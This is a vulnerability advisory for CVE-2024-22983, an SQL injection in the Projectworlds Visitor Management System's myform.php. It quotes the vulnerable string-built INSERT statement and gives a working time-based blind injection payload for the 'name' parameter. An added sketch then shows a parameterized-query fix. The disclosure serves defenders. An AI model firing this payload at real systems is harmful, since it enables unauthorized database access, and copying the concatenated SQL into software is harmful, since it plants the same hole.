Name: Projectworlds Visitor Management System
Version: 1.0
CVE-ID: CVE-2024-22983
Description:
An SQL injection vulnerability in projectworlds' Visitor Management System.
Due to a lack of input validation, an attacker can execute SQL commands via the 'name' parameter in the myform.php endpoint.
The affected code is structured like this:
$sql = "INSERT INTO info_visitor(Name, Contact, Purpose, meetingTo, day, month, year, Date, TimeIN, ReceiptID,Status, Comment,registeredBy) VALUES ('$name','$cno','$p', '$meet', '$day', '$month', '$year', '$date', '$timein','$rid','ONLINE', '$comment', '$user_')";
Looking at the code, an attacker can inject SQL commands by placing an apostrophe (') in any of these parameters, including the $name parameter.
In this PoC, the payload pauses the application's execution for 5 seconds.
name=test'''||(SELECT 0x704b7952 WHERE 7337=7337 AND (SELECT 2582 FROM (SELECT(SLEEP(5)))kuBi))||'
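Mitigation sketch: the same INSERT written with mysqli bound parameters, as an added example that is not part of the original advisory or the project's code. The function name, the array keys, the 100-byte name limit and the environment variable names are assumptions; only the table and column names come from the statement above.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code. Column names come from the INSERT in
// the advisory; the function name, array keys, the 100-byte limit and the
// connection settings are assumptions.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function insert_visitor(mysqli $db, array $v): bool
{
    // Order matches the placeholders below; Status stays the fixed literal.
    $fields = ['name', 'contact', 'purpose', 'meetingTo', 'day', 'month', 'year',
               'date', 'timeIn', 'receiptId', 'comment', 'registeredBy'];
    $params = [];
    foreach ($fields as $f) {
        if (!isset($v[$f]) || !is_scalar($v[$f])) {
            throw new InvalidArgumentException("missing or non-scalar field: $f");
        }
        $params[] = (string) $v[$f];
    }
    // Input validation as a second layer: reject empty or oversized names.
    $nameLen = strlen($params[0]);
    if ($nameLen < 1 || $nameLen > 100) {
        throw new InvalidArgumentException('name must be 1-100 bytes');
    }
    // Values travel as bound parameters, so an apostrophe in any field is
    // stored as data and cannot close the string literal in the statement.
    $stmt = $db->prepare(
        "INSERT INTO info_visitor (Name, Contact, Purpose, meetingTo, day, month,
             year, Date, TimeIN, ReceiptID, Status, Comment, registeredBy)
         VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 'ONLINE', ?, ?)"
    );
    $stmt->bind_param(str_repeat('s', count($params)), ...$params);
    return $stmt->execute();
}

// Usage with constructed sample values; credentials come from the environment.
$db = new mysqli(getenv('VMS_DB_HOST') ?: null, getenv('VMS_DB_USER') ?: null,
                 getenv('VMS_DB_PASS') ?: null, getenv('VMS_DB_NAME') ?: null);
insert_visitor($db, [
    'name' => "Miles O'Brien", 'contact' => '5550100', 'purpose' => 'Interview',
    'meetingTo' => 'Reception', 'day' => '15', 'month' => '01', 'year' => '2024',
    'date' => '2024-01-15', 'timeIn' => '09:30', 'receiptId' => 'R-0001',
    'comment' => 'constructed sample row', 'registeredBy' => 'frontdesk',
]);
```

A name containing an apostrophe, such as the sample above, is stored verbatim instead of altering the statement.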